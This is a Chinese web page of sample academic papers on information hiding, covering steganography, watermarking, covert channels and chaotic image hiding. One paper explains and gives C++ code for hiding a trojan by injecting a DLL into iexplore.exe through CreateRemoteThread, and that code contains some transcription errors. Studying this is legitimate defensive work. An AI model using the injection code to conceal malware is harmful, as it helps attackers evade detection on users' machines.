期刊大全 杂志订阅 SCI期刊 投稿指导 期刊服务 文秘服务 出版社 登录/注册 购物车(0)

首页 > 精品范文 > 隐藏技术论文

隐藏技术论文精品(七篇)

时间:2023-03-16 15:57:51

隐藏技术论文

隐藏技术论文篇(1)

【关键词】信息隐藏 安全 技术

多媒体技术和通信技术带来极大方便,但数字化的多媒体信息很容易受到非法访问、篡改、复制和传播,给人们的生产生活及生命财产带来隐患。魔高一尺道高一丈,信息隐藏技术应运而生。

一、信息隐藏技术及其特征

信息隐藏技术利用载体数据的冗余性以及人的感官局限性,将一个特定信息隐藏在另外一个被称为载体的信息中。信息隐藏技术融合电子工程、计算机科学、信号处理、通信、多媒体技术等多学科,是新兴技术体系。信息隐藏所用载体可以是文本、图像、音频、视频,甚至可以是某个信道或某套编码体制。信息能够隐藏在载体中,载体数据本身具有很大的冗余性,未压缩的多媒体信息编码效率是很低,将某些信息嵌入到该载体信息中进行秘密传送完全可行,不会影响多媒体信息本身的传送和使用;人的感觉器官对于所接收信息都有一定掩蔽效应,如人耳对不同频段声音敏感程度不同,可将信息隐藏到载体中而不被觉察。

信息隐藏技术的特征明显:不可察觉性,嵌入信息后,要求不会引起载体发生可感知变化;不可检测性,嵌入隐藏信息后,计算机不能发现和检测;安全性,嵌入信息后,必须拥有相关信息才能够提取所嵌入内容;纯正性,提取操作时,即便载密文件受到损压缩、解压缩、滤波、转换等扰动,也能提取隐藏信息;稳定性,隐藏信息能“永久”存在;安全性,第三方在不知道隐藏算法和隐藏密钥情况下,不能获取信息相关数据。信息隐藏技术按载体分为,基于文本、图像、音频、视频、超文本、网络层、图形等媒体的信息隐藏技术;按嵌入域分为基于空域(或时域)和变换域的隐藏技术;按嵌入策略分为替换调制、模式调制和扩频叠加调制等技术;按提取要求分为盲隐藏技术和非盲隐藏技术;按作用分为隐蔽通信和数字水印技术;按密钥分为无密钥隐藏和有密钥隐藏。

二、信息隐藏技术的研究及演进

信息安全事关个人利益,也事关国家安全、社会稳定以及经济发展,各国政府无不重视信息和网络安全。密码技术一直是保障信息安全的重要手段,但这并不能解决问题。截获者发现网络文件加密,往往会引起注意,并激发其破解欲望,即使不能成功破解,也能轻易拦截并破坏秘密信息,干扰通信进行。针对密码技术的局限性,上世纪90年代国际上出现了信息隐藏技术(InformationHiding)。

现代信息隐藏研究主要集中在静态图像领域,目前信息隐藏所用载体已扩展到文字、图像、声音及视频等领域。在全球信息化、数字化迅猛发展时代背景下,对知识产权保护、隐密通信等需求激发了对信息隐藏技术的研究热潮。国际上研究信息隐藏的机构主要有剑桥大学、麻省理工学院、NEC美国研究所、IBM研究中心等,已提出了一些优秀隐藏算法。我国于1999年在何德全、周仲义、蔡吉人等三位院士大力倡导下召开了第一届信息隐藏学术研讨会,我国对信息隐藏的研究也取得重要成果。目前在信息隐藏中无论是数字水印还是隐密通信,都得到越来越广泛应用。应用领域不断扩大,从最初静态图片发展到文本、音频、视频、电脑文件、流媒体、网页及网络传输中的数据包,甚至是无线通信领域中的语音通信和手机彩信等领域。我国对信息隐藏的研究取得了很多成果,基本与世界水平保持一致。如今信息隐藏研究已出现百花齐放、百家争鸣局面。

三、信息隐藏技术的应用

随着信息技术飞速发展,人类利用的信息越来越丰富,通信技术发展使人们能够方便、快捷、灵活地使用文本、语音、图像与视频等多种方式通信;各种数字化信息处理技术使得网络中传输任何类型的文件(如文本、图像、音频和视频等)都可被数字化,极大方便了对各种信息数据压缩、存储、复制、处理和利用。

信息隐藏技术主要有隐写术和数字水印。目前,信息隐藏技术的应用主要在以下方面:一是隐密通信。通过隐写术将秘密信息嵌入在公开媒体文件中传播消息。早期的隐密通信,接收方和发送方甚至不必交换电子邮件,直接交互文件或登录特定计算机和账户。随着网络及通信技术发展,隐密通信所用通信方式从简单数据文件交互到互联网以及无线通信领域。二是版权保护。通过数字水印技术在媒体文件中嵌入特定数字标识或签名,标识媒体文件所有权和版权信息等。三是数据完整性保护。防护篡改、完整性保护中所采用的数字水印为易损水印或脆弱水印,任何对媒体文件修改都会从隐藏数据中反映出来。四是印刷品防伪。印刷品印刷之前嵌入一定标识信息,印刷后作品可经过扫描再次输入计算机,通过特定水印提取和鉴别方法来鉴别作品真伪。五是拷贝控制。控制媒体文件拷贝次数,防止大规模盗版或非法复制。

信息隐藏技术重点运用领域是移动通信领域。移动通信网络方便快捷,在军事和商业通信中广泛应用。移动通信领域多媒体短信将文本、图片、音频、视频等组合成多媒体消息进行发送。移动通信领域中多媒体短信以其特有的直观性、生动性和集成性,面市以来得到广泛关注。多媒体短信即彩信的最大特色是支持多媒体功能,可将不同的媒体,如文本、图片、音频、视频等组合在一起进行发送。彩信标准并没有对彩信所支持的文件格式给出具体限制,理论上只要在封装打包时为彩信所包含的各媒体文件设置好适当类型参数即可;但实际上具体的彩信所支持媒体格式还是有限的,这主要与手机终端彩信软件和MMSC支持传送媒体格式有关。随着3G普及以及手机终端行业发展,彩信所支持的媒体文件格式将更丰富多样,为信息隐藏技术在彩信中的应用提供了更为广阔的空间。

【参考文献】

[1]刘宏.信息隐藏技术在遥感影像中的应用.信息工程大学硕士学位论文,2008.

隐藏技术论文篇(2)

1研究背景理论意义

网络通信的安全极为重要,早年大家是通过对网络信息的加密处理来保护信息的安全,但是随着计算机技术的不断发展破译技术已经很成熟,早年用密文加密对手段已经没有办法保证信息的安全,要知道信息一旦被破译有可能不仅仅是财产损失,很多个人信息也会无法受到保护,由此就产生了信息的隐蔽方法。

1.1隐蔽通信技术在国内外的现状与发展趋势

信息隐蔽技术是通过对信息进行处理然后通过信道进行信息的传送,就是通过载体把信息变为隐蔽信息载体。目前的隐蔽通本文由论文联盟收集整理信技术研究还是基于数字认证安全和版权的认证,另一方面就是对信息的加密。早在上世纪80年代美国就信息安全问题下达过信息安全指令,而我国在1999年也下达了相同的指令,学者表示通过网络数据流来隐蔽通信技术是可以实施的,隐蔽通信技术也就此成为了研究热议的话题。

1.2网络流隐蔽通信技术的优势

网络数据不是静态的而是动态的,从出现到消失人们都难以捕捉,很多黑客也无法拦截到准确的信息,这是网络数据的优势之一,可以利用其动态的特性。

网络世界报传送的信息量是十分巨大的,每分每秒都有数以万计的网络数据包在传送,利用网络数据包来隐蔽通信技术很可行,它有自身独特的特性和优势,可以保护信息安全。

1.3隐蔽通信技术存在的问题和研究目的

传统的隐蔽通信技术很容易被检测器检测出来,只有对协议进行分析就很容易发现隐蔽信道,所以传统的隐蔽通信技术隐藏能力低。通过算法可以估计信道内信息传输量,传统的信息隐蔽技术通过数据包头可以隐蔽的信息量很少,所以隐蔽通信技术还存在信息容量小的问题。而我们研究的目的就是为了提高信息的存储量,提升信息容量的算法就是当务之急,并且研究目的也在于提高网络流对信息通讯的隐蔽性。

2隐蔽通信信道的探究

2.1时间信道的报文延迟

在tic通道中,传递符号“0”的时间为si0,传递符号“1”的时间为si1。下面我们分别从信道容量和平均传递时间两方面讨论影响信息传送的因素。在实际网络中,报文的延迟时间是变化的,从而导致了同一报文发送间隔会对应多种可能的报文到达间隔。对一发送间隔而言,到达时间间隔将分布在以该发送间隔为中心一段区域内。到达间隔分布越集中,解码中的误码率越低,信道容量就越大。

2.2隐蔽信道存在的必要条件

隐蔽信道是隐蔽在网络通信下的另一种通信方式,它

的存在就是问了实现隐蔽通信。隐蔽信道是可行的,从信息理论角度,信息的输出和输入是有着必然的联系,隐蔽信道从正常的输入端输入,隐蔽信息的接收方从正常的信道接收这样就可以实现信息的隐蔽,其中必须具备以下的条件;(1)传送放和接收方的共享资源属性和权限必须相同;(2)必须能够控制传送方和接收方之间的通信,能够调节传输的顺序;(3)必须满足时间特性双方都参考一个时钟。网络时间信道可以作为载体把传送方和接收方联系起来,传送者改变报文时间特性接收者可以第一时间检查出被改变的时间报文对其进行解读。

2.3隐蔽时间信道特性分析

计算机网络中传输的相邻报文往往是不在相同的网络环境下,所以在网络传送的时间上是有差别的,根据相邻报文的时间差来接收隐蔽的通信信息是隐蔽信息技术的有效途径之一,但是相邻报文的传送存在一定的误码率,所以要最大限度的提升信息容量,隐蔽信息技术必须提高对网络环境的抗干扰能力。信息隐藏算法中主要有两种算法,其中有空间域算法,其中最具代表性的就是lsb算法。对于扩展时间信道的容量我们必须加强对算法的研究。

2.4信息隐藏技术对现代的意义

隐藏技术论文篇(3)

电子信息隐藏技术是近些年来在多媒体技术和互联网推动下发展起来的一种信息安全技术。这种技术具备明显的优势,因而被广泛的应用。本文从电子信息隐藏技术的概述出发,分析了电子信息隐藏技术特征,并就电子信息隐藏技术的应用进行了讨论,希望能为相关者提供帮助,使他们能够深入研究电子信息隐藏技术,提高电子信息隐藏技术的应用水平。

关键词:

电子信息;隐藏技术

在利用互联网传送数据、文件的时候,极有可能会出现数据、文件被攻击、窃取等问题,尤其那些关于国家安全、经济发展、个人隐私的资料,一旦被非法分子获取,极有可能会影响国家的经济以及个人的安危。为了有效的解决这些问题,人们引入了网络加密技术。但是加密技术将文件、数据变成了乱码,更易激发某些人“挑战权威”的欲望。为了解决新问题,人们又引进了信息隐藏技术,将机密文件“伪装”成普通文件,这样就能有效的混淆人们的视听,提升网络传输的安全性。

一、电子信息隐藏技术

电子信息隐藏与信息伪装是同一个概念,都是利用有效手段将机密信息隐藏于另一个非机密信息之中,用以混淆“有心人”视听的一种电子信息技术。隐藏技术的载体类型非常的多样,可以是图像、声音、视频还可以是文档,因此,不易被一般人辨识,即便某些人发现了隐藏信息,也难以提取信息,这就使得机密的信息、文件得以安全传输。因传统的加密技术思想和方法具备优势,所以现阶段人们所使用的信息隐藏技术是在有所保留的同时进行了改进。按照处理对象的不同信息隐藏技术可以被分为数字水印技术、叠像技术以及替声技术等。其中,叠像技术是一种将信息隐藏在载体中进行安全传输的技术。数字水印技术可以在开放的网络环境下保护版权,可以识别与版权相关各方的信息,并将这些信息转化成“隐藏信息”嵌入图像、音频、视频等,以实现确认所有权和信息跟踪目标。替声技术按照声音包含的内容进行分类,可以通过处理声音信息,改变原声的对象、内容等隐藏真正的声音信息。

二、电子信息隐藏技术的特征分析

与传统的信息相比,安全技术电子信息隐藏技术具备六个明显的特征优势:第一,安全性。能够有效的抗击强攻击能力,即便是遭受了一定的人为攻击,隐藏信息也可以最大限度的保存,而不受破坏。第二,隐蔽性。因为电子信息隐藏技术将需要传递的信息、资料隐藏于普通载体之中,信息对象的外部特征得以伪装,也更难以被不法分子察觉、阻拦。第三,不可测性。因为隐蔽载体与原始载体存在某些潜在的、不容人轻易窥见的关联性,即使被人拦截,想要正确的提取,却也存在较大的困难。即便是能够提取,也需要消耗大量的时间,这也就为信息、资料拥有者采取有效措施提供了时间。第四,不可见性。电子信息隐藏技术利用人类视听觉属藏处理资料、信息,目标资料的内容、质量并没有改变,但却无法被人为的看见或是听见。第五,不可变性。即便是隐藏载体发生变化,比较常见的变化类型包括诸如增强、滤波、有损压缩、重采样等一系列传输过程中的载体信号处理,诸如旋转、平移、分割、缩放等一般的几何变换以及恶意攻击等,目标文件所包含的信息也不会丢失。第六,自恢复性。虽然电子信息隐藏技术具备不可变性,但是这种性质并不能保证信息百分之百的绝对的“不可变”,因此,自恢复性有效的解决了操作损毁、变换文件的问题,只要损毁的标文件还残留部分的数据,即使没有宿主信号,也可以采取有效的措施,对目标文件进行恢复。

三、电子信息隐藏技术的应用状况

(一)数据保密方面的应用互联网的使用方便了人们的生活、学习,人们利用互联网进行资料、数据的传输。然而,随着互联网技术的普及,很多不法之徒也将目光转向了互联网方向,非授权用户利用不法手段截获、使用相关资料,导致网络不安全问题发生,严重的损害信息、资料所有者的权益。现阶段,经济全球化发展迅猛,互联网传输资料所涉及的面也更加的广泛,政治、军事、商业、金融、个人隐私等的泄漏将会带来的不良结果,谁也无法妄下断言。因此,信息隐藏是及其重要且必要的。信息隐藏技术可以保护网上信息交流的安全系,还可以满足一些人隐藏存储私人的、“不愿为外人道”的个人隐私。

(二)数据完整性鉴定方面的应用现阶段最常使用的信息隐藏技术包括数字水印技术、叠像技术以及替声技术,通过分析这三种技术的实际应用情况,不难发现数字水印技术存在缺陷,一旦保护媒体被篡改,数字水印技术所隐藏的目标文件将会被破坏、暴露,进而被不法之徒识别。数字水印技术的使用在数字票据中比较常见。由于隐藏的水印经打印后仍可保留,因此在鉴别数字票据真伪的时候,可以利用再扫描的方法使水印变为数字形式,提取防伪水印。数据完整性鉴定包括鉴定信号真伪、鉴定信号的完整性、指出信号差别以及资料传输过程有无发生篡改、丢失等情况。数据完整性鉴定可以准确的鉴定获知信号的真实性,大幅度的降低虚假、错误信息的使用。在具体应用的时候主要包括如下两个步骤:首先,利用数据库管理系统保证数据完整、准确的输入和储存。其次,充分考虑实际情况,选择最合适的数据校验方式对传输数据进行校验检查。

四、结束语

综上所述,信息隐藏技术具备难以估量的应用价值以及广阔的应用前景。但是作为一种有效的新型信息安全技术,信息隐藏技术的体系以及技术等都还有待加强。相关人士应充分的认识现阶段的信息隐藏技术的优势与劣势,深入的研究信息隐藏技术,进而使信息隐藏技术更好的发挥作用。

参考文献:

[1]陈素霞,陈亚锋.浅谈信息隐藏技术及其应用[J].沿海企业与科技,2010(03).

[2]韩敏,董俊磊.浅谈信息隐藏技术的理论及应用[J].黑龙江科技信息,2010(06).

隐藏技术论文篇(4)

关键字进程 线程 木马 动态链接库

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了windows nt/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现windows nt/2000系统中进程的隐藏。

1 基本原理

在win95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在windows nt/2000中却完全不同, 无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过windows nt/2000的任务管理器,windows nt/2000的任务管理器均能轻松显示出木马进程,难道在windows nt/2000下木马真的再也无法隐藏自己的进程了?我们知道,在windows系统下,可执行文件主要是exe和com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和socket已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。www.133229.COm在windows nt/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2 实现方法

为了弄清实现方法,我们必须首先了解windows系统的另一种"可执行文件"----dll,dll是dynamic link library(动态链接库)的缩写,dll文件是windows的基础,因为所有的api函数都是在dll中实现的。dll文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为dll文件不能独立运行,所以在进程列表中并不会出现dll,假设我们编写了一个木马dll,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马dll,如果那个进程是可信进程,(例如浏览器程序iexplore.exe,没人会怀疑它是木马吧?)那么我们编写的dll作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行dll方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口hook、挂接api、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过createthread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过createremotethread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3 实施步骤

1) 用process32next()函数找到宿主进程,获取宿主进程id,并用

openprocess()函数打开宿主进程。

2) 用virtualallocex()函数分配远程进程地址空间中的内存。

3) 用writeprocessmemory()函数将待隐藏的dll的路径名。

4) 拷贝到步骤二已经分配的内存中。

5) 用getprocaddress()函数获取loadlibrarya()函数的实地址(在kernel32.dll中)。

6) 用createremotethread()函数在远程进程中创建一个线程。

7) 它调用正确的loadlibrarya()函数。

8) 为它传递步骤二中分配的内存地址。

4 具体实例

下面是在c++builder 4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include <vcl.h>

#include <windows.h>

#include <stdio.h>

#include <tlhelp32.h>//该头文件包涵了进程操作的api函数

#pragma hdrstop

#include "unit1.h"

#pragma package(smart_init)

#pragma resource "*.dfm"

insisting pszlibfilename;//存放待隐藏的dll文件名

handle hprocesssnap=null;//进程快照句柄

handle hremoteprocess;//远程进程句柄

lpvoid pszlibfileremote;//远程进程中分配给文件名的空间

hmodule phmd;//存放kernel32.dll句柄

handle hremotethread1=null;//存放远程线程句柄

tform1 *form1;

//---------------------------------------------------------

__fast call tform1::tform1(tcomponent* owner)

: tform(owner)

{

}

//---------------------------------------------------------

void __fastcall tform1::button1click(tobject *sender

{

processentry32 pe32={0};

dword dwremoteprocessid;

hprocesssnap=createtoolhelp32snapshot(th32cs_snapprocess,0);

//打开进程快照

if(hprocesssnap==(handle)-1)

{

messagebox(null,"createtoolhelp32snapshot failed","",mb_ok);

exit(0);

} //失败返回

pe32.dwsize=sizeof(processentry32);

if(process32first(hprocesssnap,&pe32)) //获取第一个进程

{

do{

ansistring te;

te=pe32.szexefile;

if(te.pos("iexplore.exe")|| te.pos("iexplore.exe"))

//找到宿主进程,以iexplore.exe为例

{ dwremoteprocessid=pe32.th32processid;

break;

}

}

while(process32next(hprocesssnap,&pe32));//获取下一个进程

}

else

{

messagebox(null,"取第一个进程失败","",mb_ok);

exit(0);

}

hremoteprocess=openprocess(process_create_thread|process_vm

_operation|process_vm_write,false,dwremoteprocessid);

//打开远程进程

pszlibfilename=getcurrentdir()+"\\"+"hide.dll";

// 假设hide.dll是待隐藏的进程

int cb=(1+pszlibfilename.length())*sizeof(char);//计算dll文件名长度

pszlibfileremote=(pwstr)virtualallocex(hremoteprocess,null,cb,

mem_commit,page_readwrite);

//申请存放文件名的空间

bool returncode=writeprocessmemory(hremoteprocess,

pszlibfileremote,(lpvoid)pszlibfilename.c_str(),cb,null);

//把dll文件名写入申请的空间

phmd=getmodulehandle("kernel32.dll");

lpthread_start_routine fnstartaddr=(lpthread_start_routine)

getprocaddress(phmd,"loadlibrarya");

//获取动态链接库函数地址

hremotethread1=createremotethread(hremoteprocess,null,0,

pfnstartaddr,pszlibfileremote,0,null);

//创建远程线

if(hremotethread1!=null)

closehandle(hremotethread1);//关闭远程线程

if(hprocesssnap!=null)

closehandle(hprocesssnap);//关闭进程快照

}

该程序编译后命名为rmtdll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在c++builder4.0环境下编写并编译了下面的hide.dll作为测试:

#include <vcl.h>

#include <windows.h>

#pragma hdrstop

#pragma argsused

bool winapi dllentrypoint(hinstance hinst, unsigned long reason, void* lpreserved)

{

char szprocessid[64];

switch(reason)

{

case dll_process_attach:

{//获取当前进程id

itoa(getcurrentprocessid(),szprocessid,10);

messagebox(null,szprocessid,"remotedll",mb_ok);

break;

}

default:

}

return true;

}

当使用rmtdll.exe程序将这个hide.dll嵌入iexplore.exe进程后假设pid=1208),该测试dll弹出了1208字样的确认框,同时使用ps工具

也能看到:

process id: 1208

c:\winnt\iexplore.exe (0x00400000)

……

c:\winnt\hide.dll (0x100000000)

……

这证明hide.dll已经在iexplore.exe进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5 结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

参考文献

1 jeffrey richter著 王建华、张焕生、侯丽坤等译 windows核心编程 机械工业出版社2

隐藏技术论文篇(5)

提出了一种基于变参数混沌系统的图像隐藏技术。首先,利用变参数混沌系统产生的混沌序列对待隐藏的秘密图像进行加密预处理;而后根据待隐藏图像的大小,把由模板图像按行转换成的一维向量分为若干等份,每一等份唯一对应于待隐藏图像的一个像素;最后,再次利用该混沌系统生成新的混沌序列来确定待隐藏图像的每个像素在每一等份中的位置,并结合图像融合技术把该像素隐藏在该等份的这个位置上。该算法保证了隐藏图像的安全性,提高了隐藏的视觉效果。实验结果证明,本算法具有很好的隐藏效果和较好的鲁棒性。

关键词:混沌系统;混沌序列;图像加密;图像融合;分段线性混沌映射图像隐藏

中图分类号:TP309

文献标志码:A

0引言

目前,对数字图像信息的保护有两种基本技术:数字图像加密技术和数字图像隐藏技术。前者是对数字图像进行位置置乱和灰度变换,隐藏图像中包含的有用信息,为数字图像提供基于内容的保护技术[1-2]。通常,经过加密的图像往往是杂乱无章的,因此,在传输时易于引起攻击者的注意。而后者则充分利用人们“所见即所得”的心理,隐藏秘密信息的存在性,以此来迷惑攻击者,从而使其放弃对图像的破译兴趣。因而,图像隐藏技术成为近年来研究的热点,学者们提出了许多数字图像的隐藏方案[3-16]。但是这些隐藏方案都必须在隐藏信息的不可见性和鲁棒性这一矛盾因素间权衡;同时,由于密钥空间小,很多设计方案都存在或多或少的缺陷[17]。文献[3-6]中方法的隐藏视觉效果较好,但在遭受剪切攻击后,恢复出的隐藏秘密信息同模板图像一样丢失了被剪切部分的数据。文献[7]中提出的隐藏方案易被检测到模板图像中隐藏有秘密图像,且密钥空间小。文献[8-12]中的方法也存在密钥空间太小的问题。比较理想的数字图像隐藏方案是在保证隐藏信息不可见性的条件下,尽可能地提高隐藏图像信息的安全性与鲁棒性。

因此,本文提出一种基于变参数混沌系统[18]与图像融合技术相结合的数字图像隐藏技术,实现了将一幅小图像隐藏在另一幅可以公开的大图像中。算法的基本思想是:利用变参数混沌系统产生的混沌序列来确定待隐藏图像像素的隐藏位置,

并结合图像融合技术把该像素融合到相应份中的相应位置,达到隐藏的目的。利用文献[18]中提出的变参数混沌系统,增大了密钥空间,增强了保密图像的安全性和算法的安全性。实验结果证明,本方案具有很好的隐藏视觉效果和较好的鲁棒性。

1变参数混沌系统

隐藏技术论文篇(6)

关键词 信息隐藏;信息隐藏技术课程;案例教学

中图分类号:G642.3 文献标识码:B

文章编号:1671-489X(2016)22-0100-03

Research on Course Teaching of Information Hiding Technology based on Case Teaching//ZHANG Zhengwei, WANG Weimin, WU

Lifa

Abstract Case teaching is the combination of theoretical knowledge and practical application. It is a process which is guided by theory to

practice, which is beneficial to improve students’ ability to under-stand and grasp the information hiding theory. According to the cha-

racteristics of this course, this paper firstly points out that the modern

information hiding problems existed in the course teaching, then carries on the system analysis the feasibility and necessity of the course, application of case teaching method, and the information hiding teaching into the teaching case of the methods, steps and matters needing attention are discussed.

Key words information hiding; course of information hiding techno-

logy; case teaching

1 引言

信息隐藏是隐蔽通信和知识产权保护等的主要手段。信息隐藏技术课程是一门实践性和理论性都较强的计算机信息专业课程,可作为高等院校具有一定计算机基础的信息安全专业、通信工程专业、密码学专业及计算机专业的研究生或高年级本科生教程,其基本知识涉及数学、密码学、人工智能、图像处理和机器学习等多个学科。在实际教学中,由于课时数有限,不能将课本知识面面俱到,为了保证课堂教学质量,通常教师会采用“教师课堂授课―教师课堂案例演示―学生课下模拟”这一传统的教学方式,以教师讲授为主,以学生学习和模仿为辅。采用案例教学法进行课堂教学[1],有利于激发学生学习动力,增强学生思维效力,改善学生理论联系实践的融会贯通能力。

案例教学法旨在增强学生分析问题、解决问题的能力,注重于实际应用。案例教学法是由哈佛大学在20世纪20年代提出来的,其主要采用一种新颖案例方式来完成课堂教学[2]。通过这种模式教学,有利于培养学生发现问题、积极思考探索、主动参与集体讨论并取得很好的效果。

普通本科院校鉴于其教育及管理定位,易造成学生基本理论知识不够完善、应用实践能力较弱,如何提高学生的综合素质能力,以更好满足社会对高素质人才要求的需求,是当前普通高等教育亟待探究的关键所在[3]。在信息隐藏技术课程教学中采用案例法教学,有助于培养学生的思维能力和实践应用能力。将项目案例运用到课堂教学[4],能使学生更加体会到成功的快乐,激发学习兴趣,有助于增强学习动力。

2 信息隐藏技术课程教学中存在的问题

信息隐藏技术作为计算机信息类专业的一门核心课程,有着较强的理论性和应用实践性。

理论性偏强,数学知识掌握要求高 信息隐藏技术这门课程虽然内容繁杂,但可以通过分析处理数字信号的方式和过程进行授课。信号可以看作一个二维有界向量,可以在空域或频域对其进行分析处理,因此,有关信号处理理论和方式都能应用到信息隐藏上来。信息隐藏技术具有较强的理论基础,需要学生掌握较好的基础知识,这对普通高校学生来说存在较大压力。同时,许多原理、公式演算和模型构建贯穿整个课程,其内容学习起来枯燥无味,容易使学生产生厌学情绪,影响学习效果。

实践技能偏弱,应用能力不强 信息隐藏技术是一门理论与实践相辅相成、紧密结合的专业性课程,这要求学生不仅要了解和掌握信息隐藏基本概念和原理,而且应具备较强的编程应用能力,能够通过编程实现各种信息隐藏处理。经历这些年的教学研究,笔者深感学生的编程实践技能有待提高,即便完成本科阶段学习,也很难实现一个简单算法,更谈不上用所学知识去完成一个综合的、系统的开发任务。

相关基础知识不扎实 信息隐藏主要是利用相关计算机技术将信息隐藏到某一载体中。该门课程主要采用工程实践的原理、算法及相关技术来完成信息的嵌入与提取。因此,该门课程涉及的知识点较多,如矩阵论、密码学、机器学习、信号分析与处理等。学生在学习该门课程时,由于并没有对这些知识进行系统的学习,因此较难理解和掌握这门课程。

3 案例教学法的含义

案例教学法是一种以案例设计与分析为基础,结合课堂讲授的教学方法。教师在教学中充当启蒙者和激励者的角色,诱导学生积极思考问题和解决问题。区别于传统教学法,案例教学法要求教师根据实际教学需要,设计并选择适当案例,指导学生对案例进行分析和探讨,并进行实践操作的教W过程。在这一过程中,学生是主体,教师是整个教学活动的指路人。选择什么样的案例,决定了该教学法能否取得成功。课堂授课是对案例决策、案例分析与选择的关键,可以激发学生思维,提高动手能力。课后案例分析报告则是经由案例教学达成教学目的的保证。案例教学与传统教学的区别如表1所示。

信息隐藏技术作为一门专业课程,其内容相对比较抽象和枯燥。传统授课通常采用“课堂讲授,课堂演示”的教学模式,无法调动学生学习积极性,导致理论记忆不深。该课程偏重工程应用研究,而目前使用的教材其内容侧重基础理论且算法较为陈旧,学生在学习该门课程后无法应用于实践,学习热情不高。近几年,学校虽已逐渐重视对学生实践环节能力的培养,但也仅仅是机械地对理论知识进行编程操作,属于被动的对学生能力的培养。跟课程相关的实验环节也多以验证性实验为主,对学生的创新性要求不高,学生实际操作还有待加强。

4 案例设计

案例教学法是一种以案例设计与分析为主、理论知识讲解为辅的教学模式。授课中要求以案例为中心,激发教师和学生的积极性和能动性,突出学生的主动性。

设计原则 案例教学法强调以学生主动学习为主,注重培养学生思维创新能力,能够较好地解决一些实际问题。项目设计要体现“以学生主动学习为主,教师课堂讲授为辅”的教学理念,摆脱过去那种“以教师讲授为主,学生学习和模仿为辅”的传统教学思想。任课教师要尽可能设计出一些带有诱发性、启导性和思维性的项目,以激发学生的学习热情和学习兴趣。

1)目的性。信息隐藏技术课程是一门工程应用性较强的学科,对学生的动手操作能力要求较高,需要注重培养学生的工程实践性技能,通过工程实践教学来提高学生的理论知识掌握能力。为了更好地提高学生的应用技能,案例的选择与设计必须遵循教学目的和教学大纲。

2)真实性。以能满足实际应用为探讨目标,理论联系实践,将社会实际应用问题引入课堂中,有利于增强学生的实践操作能力。这将为学生未来从事相关开发与研究打下坚实基础。

3)代表性。考虑到信息隐藏技术课程教学学时有限,不能面面俱到讲解课程所有知识点,因此,所选取或设计的教学案例应具有专一性、实时性、代表性和可操作性,这样有助于培养学生解决实际问题和思维创新能力。

4)实用性。信息隐藏技术课程主要讲解的是信息嵌入、信息提取和篡改定位等相关内容,这要求所选取案例一定要结合实际,满足社会实际应用的要求。

5)生动性。信息隐藏技术课程其理论原理相对较为枯燥,很难调动学生学习积极性。将客观枯燥的原理通过生动的案例进行形象描述,这将有助于培养学生学习该课程的兴趣。

案例设计的基本方法 信息隐藏技术案例教学主要围绕案例准备、案例实施、案例评价等几个步骤展开。

1)案例准备。教师需要根据实际应用设计出一个能充分激发学生兴趣、提高动手能力的案例。教师和学生对此案例进行沟通理解,划分小组,指定组长,明确各组员任务。通过组内成员共同撰写目标,明确各自不同的兴趣,确定任务和预期效果。

2)案例实施。首先,教师要组织学生对案例进行分析理解,通过各组的讨论、分析并提出实施思路。其次,教师根据学生的实施思路进行针对性讲解后,要求学生对实施思路进行讨论修改,并提出修改方案。最后,由学生各组共同协作完成案例制作。在制作过程中,教师要不断激励学生要勇于创新、突破自我,充分发挥想象力。

3)效果评价。案例效果评价主要用来检验学生的学习状况。不能用单一的评价指标来评价案例教学法的优劣,需要倡导学生的主体地位,鼓励团队协作,分层进行评价。同时需要展开团队互评及个人自评等形式。案例教学法以学生学习为主体,存在多个实践环节,需要教师对相关环节进行记录,了解和掌握学生的实际操作情况,并予以指导。

5 案例教学法在信息隐藏技术教学中的应用

